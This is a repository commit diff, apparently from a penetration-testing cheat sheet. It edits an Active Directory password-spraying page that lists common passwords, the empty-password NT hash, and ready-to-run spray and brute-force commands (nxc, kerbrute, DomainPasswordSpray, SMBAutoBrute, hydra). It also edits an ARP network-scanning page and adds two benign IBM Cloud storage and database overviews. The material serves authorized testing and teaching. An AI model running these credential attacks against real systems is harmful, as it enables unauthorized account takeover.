Compare commits
6 Commits
5de0d56175
...
630e2be43c
Author | SHA1 | Date |
---|---|---|
Swissky | 630e2be43c | |
Swissky | 35e5d426b0 | |
Swissky | c2f815f5b0 | |
Nidhi Shinde | c8e78f4c82 | |
Nidhi Shinde | 7ffd929ec1 | |
DoI | cc02896bd8 |
|
@ -6,75 +6,82 @@ Password spraying refers to the attack method that takes a large number of usern
|
||||||
|
|
||||||
Most of the time the best passwords to spray are :
|
Most of the time the best passwords to spray are :
|
||||||
|
|
||||||
- `P@ssw0rd01`, `Password123`, `Password1`, `Hello123`, `mimikatz`
|
- Passwords: `P@ssw0rd01`, `Password123`, `Password1`,
|
||||||
- `Welcome1`/`Welcome01`
|
- Common password: `Welcome1`/`Welcome01`, `Hello123`, `mimikatz`
|
||||||
- $Companyname1:`$Microsoft1`
|
- $Companyname1:`$Microsoft1`
|
||||||
- SeasonYear: `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!`
|
- SeasonYear: `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!`
|
||||||
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
|
- Default AD password with simple mutations such as number-1, special character iteration (`*`,`?`,`!`,`#`)
|
||||||
- Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0)
|
- Empty Password: NT hash is `31d6cfe0d16ae931b73c59d7e0c089c0`
|
||||||
|
|
||||||
|
:warning: be careful with the account lockout !
|
||||||
## Kerberos pre-auth bruteforcing
|
|
||||||
|
|
||||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
|
||||||
|
|
||||||
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
|
|
||||||
|
|
||||||
* Username bruteforce
|
|
||||||
```powershell
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
|
||||||
```
|
|
||||||
* Password bruteforce
|
|
||||||
```powershell
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
|
||||||
```
|
|
||||||
* Password spray
|
|
||||||
```powershell
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## Spray a pre-generated passwords list
|
## Spray a pre-generated passwords list
|
||||||
|
|
||||||
* Using `netexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
* Using [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)
|
||||||
```powershell
|
```powershell
|
||||||
netexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
nxc smb 10.0.0.1 -u /path/to/users.txt -p Password123
|
||||||
|
nxc smb 10.0.0.1 -u Administrator -p /path/to/passwords.txt
|
||||||
|
|
||||||
|
nxc smb targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc ldap targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc rdp targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc winrm targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc mssql targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
nxc wmi targets.txt -u Administrator -p Password123 -d domain.local
|
||||||
|
|
||||||
|
nxc ssh targets.txt -u Administrator -p Password123
|
||||||
|
nxc vnc targets.txt -u Administrator -p Password123
|
||||||
|
nxc ftp targets.txt -u Administrator -p Password123
|
||||||
|
nxc nfs targets.txt -u Administrator -p Password123
|
||||||
```
|
```
|
||||||
* Using `DomainPasswordSpray` to spray a password against all users of a domain.
|
|
||||||
|
* Using [hashcat/maskprocessor](https://github.com/hashcat/maskprocessor) to generate passwords following a specific rule
|
||||||
|
```powershell
|
||||||
|
nxc smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||||
|
```
|
||||||
|
|
||||||
|
* Using [dafthack/DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) to spray a password against all users of a domain.
|
||||||
```powershell
|
```powershell
|
||||||
# https://github.com/dafthack/DomainPasswordSpray
|
|
||||||
Invoke-DomainPasswordSpray -Password Summer2021!
|
Invoke-DomainPasswordSpray -Password Summer2021!
|
||||||
# /!\ be careful with the account lockout !
|
|
||||||
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
|
||||||
```
|
```
|
||||||
* Using `SMBAutoBrute`.
|
|
||||||
|
* Using [shellntel-acct/scripts/SMBAutoBrute](https://github.com/shellntel-acct/scripts/blob/master/Invoke-SMBAutoBrute.ps1).
|
||||||
```powershell
|
```powershell
|
||||||
|
Invoke-SMBAutoBrute -PasswordList "jennifer, yankees" -LockoutThreshold 3
|
||||||
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Spray passwords against the RDP service
|
|
||||||
|
|
||||||
* Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
|
|
||||||
```powershell
|
|
||||||
git clone https://github.com/xFreed0m/RDPassSpray
|
|
||||||
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
|
|
||||||
```
|
|
||||||
* Using [hydra](https://github.com/vanhauser-thc/thc-hydra) and [ncrack](https://github.com/nmap/ncrack) to target RDP services.
|
|
||||||
```powershell
|
|
||||||
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
|
|
||||||
ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## BadPwdCount attribute
|
## BadPwdCount attribute
|
||||||
|
|
||||||
> The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.
|
> The number of times the user tried to log on to the account using an incorrect password. A value of `0` indicates that the value is unknown.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
|
$ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
|
||||||
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
|
LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: <never>
|
||||||
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
|
LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: <never>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Kerberos pre-auth bruteforcing
|
||||||
|
|
||||||
|
Using [ropnop/kerbrute](https://github.com/ropnop/kerbrute), a tool to perform Kerberos pre-auth bruteforcing.
|
||||||
|
|
||||||
|
> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
|
||||||
|
|
||||||
|
* Username bruteforce
|
||||||
|
```powershell
|
||||||
|
./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
|
||||||
|
```
|
||||||
|
* Password bruteforce
|
||||||
|
```powershell
|
||||||
|
./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
|
||||||
|
```
|
||||||
|
* Password spray
|
||||||
|
```powershell
|
||||||
|
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
|
||||||
|
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
|
||||||
|
./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
|
||||||
|
```
|
|
@ -54,12 +54,27 @@ MDNS works by using multicast addresses to send DNS queries and responses. When
|
||||||
mdns-scan
|
mdns-scan
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## ARP
|
## ARP
|
||||||
|
|
||||||
ARP (Address Resolution Protocol) is a networking protocol used to map IP addresses to MAC (Media Access Control) addresses on a local area network (LAN).
|
ARP (Address Resolution Protocol) is a networking protocol used to map IP addresses to MAC (Media Access Control) addresses on a local area network (LAN).
|
||||||
|
|
||||||
* ARP scan
|
* ARP neighbors
|
||||||
|
```ps1
|
||||||
|
:~$ ip neigh
|
||||||
|
192.168.122.1 dev enp1s0 lladdr 52:54:00:ff:0a:2c STALE
|
||||||
|
192.168.122.98 dev enp1s0 lladdr 52:54:00:ff:aa:bb STALE
|
||||||
|
```
|
||||||
|
|
||||||
|
* ARP scan with `nmap` - note, needs root privileges. Check what packets nmap is sending with `--packet-trace`
|
||||||
|
```ps1
|
||||||
|
:~# nmap -sn -n 192.168.122.0/24
|
||||||
|
Starting Nmap 7.93 ( https://nmap.org )
|
||||||
|
Nmap scan report for 192.168.122.1
|
||||||
|
Host is up (0.00032s latency).
|
||||||
|
MAC Address: 52:54:00:FF:0A:2C (QEMU virtual NIC)
|
||||||
|
```
|
||||||
|
|
||||||
|
* ARP scan with `arp-scan`
|
||||||
```ps1
|
```ps1
|
||||||
root@kali:~# arp-scan -l
|
root@kali:~# arp-scan -l
|
||||||
Interface: eth0, datalink type: EN10MB (Ethernet)
|
Interface: eth0, datalink type: EN10MB (Ethernet)
|
||||||
|
|
|
@ -0,0 +1,129 @@
|
||||||
|
# IBM Cloud Managed Database Services
|
||||||
|
|
||||||
|
IBM Cloud offers a variety of managed database services that allow organizations to easily deploy, manage, and scale databases without the operational overhead. These services ensure high availability, security, and performance, catering to a wide range of application requirements.
|
||||||
|
|
||||||
|
## Supported Database Engines
|
||||||
|
|
||||||
|
### 1. PostgreSQL
|
||||||
|
|
||||||
|
- **Description**: PostgreSQL is an open-source relational database known for its robustness, extensibility, and SQL compliance. It supports advanced data types and offers features like complex queries, ACID compliance, and full-text search.
|
||||||
|
|
||||||
|
- **Key Features**:
|
||||||
|
- Automated backups and recovery
|
||||||
|
- High availability with clustering options
|
||||||
|
- Scale horizontally and vertically with ease
|
||||||
|
- Support for JSON and unstructured data
|
||||||
|
- Advanced security features including encryption
|
||||||
|
|
||||||
|
- **Use Cases**:
|
||||||
|
- Web applications
|
||||||
|
- Data analytics
|
||||||
|
- Geospatial data applications
|
||||||
|
- E-commerce platforms
|
||||||
|
|
||||||
|
#### Connecting to PostgreSQL
|
||||||
|
|
||||||
|
You can connect to a PostgreSQL database using various programming languages. Here's an example in Python using the `psycopg2` library.
|
||||||
|
|
||||||
|
```python
|
||||||
|
import psycopg2
|
||||||
|
|
||||||
|
# Establishing a connection to the PostgreSQL database
|
||||||
|
conn = psycopg2.connect(
|
||||||
|
dbname="your_database_name",
|
||||||
|
user="your_username",
|
||||||
|
password="your_password",
|
||||||
|
host="your_host",
|
||||||
|
port="your_port"
|
||||||
|
)
|
||||||
|
|
||||||
|
cursor = conn.cursor()
|
||||||
|
|
||||||
|
# Example of a simple query
|
||||||
|
cursor.execute("SELECT * FROM your_table;")
|
||||||
|
records = cursor.fetchall()
|
||||||
|
print(records)
|
||||||
|
|
||||||
|
# Closing the connection
|
||||||
|
cursor.close()
|
||||||
|
conn.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
### 2. MongoDB
|
||||||
|
|
||||||
|
- **Description**: MongoDB is a leading NoSQL database that provides a flexible data model, enabling developers to work with unstructured data and large volumes of data. It uses a document-oriented data model and is designed for scalability and performance.
|
||||||
|
|
||||||
|
- **Key Features**:
|
||||||
|
- Automatic sharding for horizontal scaling
|
||||||
|
- Built-in replication for high availability
|
||||||
|
- Rich querying capabilities and indexing options
|
||||||
|
- Full-text search and aggregation framework
|
||||||
|
- Flexible schema design
|
||||||
|
|
||||||
|
- **Use Cases**:
|
||||||
|
- Content management systems
|
||||||
|
- Real-time analytics
|
||||||
|
- Internet of Things (IoT) applications
|
||||||
|
- Mobile applications
|
||||||
|
|
||||||
|
#### Connecting to MongoDB
|
||||||
|
You can connect to MongoDB using various programming languages. Here's an example in JavaScript using the mongodb library.
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
const { MongoClient } = require('mongodb');
|
||||||
|
|
||||||
|
// Connection URI
|
||||||
|
const uri = "mongodb://your_username:your_password@your_host:your_port/your_database";
|
||||||
|
|
||||||
|
// Create a new MongoClient
|
||||||
|
const client = new MongoClient(uri);
|
||||||
|
|
||||||
|
async function run() {
|
||||||
|
try {
|
||||||
|
// Connect to the MongoDB cluster
|
||||||
|
await client.connect();
|
||||||
|
|
||||||
|
// Access the database
|
||||||
|
const database = client.db('your_database');
|
||||||
|
const collection = database.collection('your_collection');
|
||||||
|
|
||||||
|
// Example of a simple query
|
||||||
|
const query = { name: "John Doe" };
|
||||||
|
const user = await collection.findOne(query);
|
||||||
|
console.log(user);
|
||||||
|
|
||||||
|
} finally {
|
||||||
|
// Ensures that the client will close when you finish/error
|
||||||
|
await client.close();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
run().catch(console.dir);
|
||||||
|
```
|
||||||
|
|
||||||
|
## Benefits of Using IBM Cloud Managed Database Services
|
||||||
|
|
||||||
|
- **Automated Management**: Reduce operational overhead with automated backups, scaling, and updates.
|
||||||
|
- **High Availability**: Built-in redundancy and failover mechanisms ensure uptime and data availability.
|
||||||
|
- **Security**: Comprehensive security features protect your data with encryption, access controls, and compliance support.
|
||||||
|
- **Scalability**: Easily scale your database resources up or down based on application needs.
|
||||||
|
- **Performance Monitoring**: Built-in monitoring and alerting tools provide insights into database performance and health.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
To begin using IBM Cloud Managed Database services, follow these steps:
|
||||||
|
|
||||||
|
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
|
||||||
|
2. **Select Database Service**: Choose the managed database service you need (PostgreSQL, MongoDB, etc.).
|
||||||
|
3. **Configure Your Database**: Set up your database parameters, including region, storage size, and instance type.
|
||||||
|
4. **Deploy**: Launch your database instance with a few clicks.
|
||||||
|
5. **Connect**: Use the provided connection string to connect your applications to the database.
|
||||||
|
|
||||||
|
## Conclusion
|
||||||
|
|
||||||
|
IBM Cloud's managed database services provide a reliable and efficient way to manage your database needs. With support for leading databases like PostgreSQL and MongoDB, organizations can focus on building innovative applications while leveraging IBM's infrastructure and expertise.
|
||||||
|
|
||||||
|
## Additional Resources
|
||||||
|
|
||||||
|
- [IBM Cloud Databases Documentation](https://cloud.ibm.com/docs/databases?code=cloud)
|
||||||
|
- [IBM Cloud PostgreSQL Documentation](https://cloud.ibm.com/docs/databases?code=postgres)
|
||||||
|
- [IBM Cloud MongoDB Documentation](https://cloud.ibm.com/docs/databases?code=mongo)
|
|
@ -0,0 +1,106 @@
|
||||||
|
# IBM Cloud Object Storage
|
||||||
|
|
||||||
|
IBM Cloud Object Storage is a highly scalable, secure, and durable cloud storage service designed for storing and accessing unstructured data like images, videos, backups, and documents. With the ability to scale seamlessly based on the data volume, IBM Cloud Object Storage is ideal for handling large-scale data storage needs, such as archiving, backup, and modern applications like AI and machine learning workloads.
|
||||||
|
|
||||||
|
## Key Features
|
||||||
|
|
||||||
|
### 1. **Scalability**
|
||||||
|
- **Dynamic Scaling**: IBM Cloud Object Storage can grow dynamically with your data needs, ensuring you never run out of storage space. There’s no need for pre-provisioning or capacity planning, as it scales automatically based on demand.
|
||||||
|
- **No Size Limits**: Store an unlimited amount of data, from kilobytes to petabytes, without constraints.
|
||||||
|
|
||||||
|
### 2. **High Durability and Availability**
|
||||||
|
- **Redundancy**: Data is automatically distributed across multiple regions and availability zones to ensure that it remains available and protected, even in the event of failures.
|
||||||
|
- **99.999999999% Durability (11 nines)**: IBM Cloud Object Storage provides enterprise-grade durability, meaning that your data is safe and recoverable.
|
||||||
|
|
||||||
|
### 3. **Flexible Storage Classes**
|
||||||
|
IBM Cloud Object Storage offers multiple storage classes, allowing you to choose the right balance between performance and cost:
|
||||||
|
- **Standard**: For frequently accessed data, providing high performance and low latency.
|
||||||
|
- **Vault**: For infrequently accessed data with lower storage costs.
|
||||||
|
- **Cold Vault**: For long-term storage of rarely accessed data, such as archives.
|
||||||
|
- **Smart Tier**: Automatically optimizes storage costs by tiering objects based on access patterns.
|
||||||
|
|
||||||
|
### 4. **Secure and Compliant**
|
||||||
|
- **Encryption**: Data is encrypted at rest and in transit using robust encryption standards.
|
||||||
|
- **Access Controls**: Fine-grained access policies using IBM Identity and Access Management (IAM) allow you to control who can access your data.
|
||||||
|
- **Compliance**: Meets a wide range of industry standards and regulatory requirements, including GDPR, HIPAA, and ISO certifications.
|
||||||
|
|
||||||
|
### 5. **Cost-Effective**
|
||||||
|
- **Pay-as-You-Go**: With IBM Cloud Object Storage, you only pay for the storage and features you use, making it cost-effective for a variety of workloads.
|
||||||
|
- **Data Lifecycle Policies**: Automate data movement between storage classes to optimize costs over time based on data access patterns.
|
||||||
|
|
||||||
|
### 6. **Global Accessibility**
|
||||||
|
- **Multi-Regional Replication**: Distribute your data across multiple regions for greater accessibility and redundancy.
|
||||||
|
- **Low Latency**: Access your data with minimal latency, no matter where your users or applications are located globally.
|
||||||
|
|
||||||
|
### 7. **Integration with IBM Cloud Services**
|
||||||
|
IBM Cloud Object Storage integrates seamlessly with a wide range of IBM Cloud services, including:
|
||||||
|
- **IBM Watson AI**: Store and manage data used in AI and machine learning workloads.
|
||||||
|
- **IBM Cloud Functions**: Use serverless computing to trigger actions when new objects are uploaded.
|
||||||
|
- **IBM Kubernetes Service**: Persistent storage for containers and microservices applications.
|
||||||
|
|
||||||
|
## Use Cases
|
||||||
|
|
||||||
|
1. **Backup and Archiving**:
|
||||||
|
- IBM Cloud Object Storage is ideal for long-term storage of backups and archived data due to its durability and cost-efficient pricing models. Data lifecycle policies automate the movement of less-frequently accessed data to lower-cost storage classes like Vault and Cold Vault.
|
||||||
|
|
||||||
|
2. **Content Delivery**:
|
||||||
|
- Serve media files like images, videos, and documents to global users with minimal latency using IBM Cloud Object Storage’s multi-regional replication and global accessibility.
|
||||||
|
|
||||||
|
3. **Big Data and Analytics**:
|
||||||
|
- Store large datasets and logs for analytics applications. IBM Cloud Object Storage can handle vast amounts of data, which can be processed using IBM analytics services or machine learning models.
|
||||||
|
|
||||||
|
4. **Disaster Recovery**:
|
||||||
|
- Ensure business continuity by storing critical data redundantly across multiple locations, allowing you to recover from disasters or data loss events.
|
||||||
|
|
||||||
|
5. **AI and Machine Learning**:
|
||||||
|
- Store and manage training datasets for machine learning and AI applications. IBM Cloud Object Storage integrates directly with IBM Watson and other AI services, providing scalable storage for vast datasets.
|
||||||
|
|
||||||
|
## Code Example: Uploading and Retrieving Data
|
||||||
|
|
||||||
|
Here’s an example using Python and the IBM Cloud SDK to upload and retrieve an object from IBM Cloud Object Storage.
|
||||||
|
|
||||||
|
### 1. **Installation**:
|
||||||
|
Install the IBM Cloud Object Storage SDK for Python:
|
||||||
|
```bash
|
||||||
|
pip install ibm-cos-sdk
|
||||||
|
```
|
||||||
|
|
||||||
|
### 2. **Uploading an Object**:
|
||||||
|
```python
|
||||||
|
import ibm_boto3
|
||||||
|
from ibm_botocore.client import Config
|
||||||
|
|
||||||
|
# Initialize the client
|
||||||
|
cos = ibm_boto3.client('s3',
|
||||||
|
ibm_api_key_id='your_api_key',
|
||||||
|
ibm_service_instance_id='your_service_instance_id',
|
||||||
|
config=Config(signature_version='oauth'),
|
||||||
|
endpoint_url='https://s3.us.cloud-object-storage.appdomain.cloud')
|
||||||
|
|
||||||
|
# Upload a file
|
||||||
|
cos.upload_file(Filename='example.txt', Bucket='your_bucket_name', Key='example.txt')
|
||||||
|
|
||||||
|
print('File uploaded successfully.')
|
||||||
|
```
|
||||||
|
|
||||||
|
### 3. **Retrieving an Object**:
|
||||||
|
```python
|
||||||
|
# Download an object
|
||||||
|
cos.download_file(Bucket='your_bucket_name', Key='example.txt', Filename='downloaded_example.txt')
|
||||||
|
|
||||||
|
print('File downloaded successfully.')
|
||||||
|
```
|
||||||
|
|
||||||
|
### Configuring IBM Cloud Object Storage
|
||||||
|
|
||||||
|
To start using IBM Cloud Object Storage, follow these steps:
|
||||||
|
|
||||||
|
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
|
||||||
|
2. **Create Object Storage**: In the IBM Cloud console, navigate to **Catalog** > **Storage** > **Object Storage**, and follow the steps to create an instance.
|
||||||
|
3. **Create Buckets**: After creating an instance, you can create storage containers (buckets) to store your objects. Buckets are where data is logically stored.
|
||||||
|
4. **Manage Access**: Define access policies using IBM IAM for your Object Storage buckets.
|
||||||
|
5. **Connect and Use**: Use the provided API keys and endpoints to connect to your Object Storage instance and manage your data.
|
||||||
|
|
||||||
|
## Conclusion
|
||||||
|
|
||||||
|
IBM Cloud Object Storage offers a highly scalable, durable, and cost-effective storage solution for various types of workloads, from simple backups to complex AI and big data applications. With features like lifecycle management, security, and integration with other IBM Cloud services, it’s a flexible choice for any organization looking to manage unstructured data efficiently.
|
Loading…
Reference in New Issue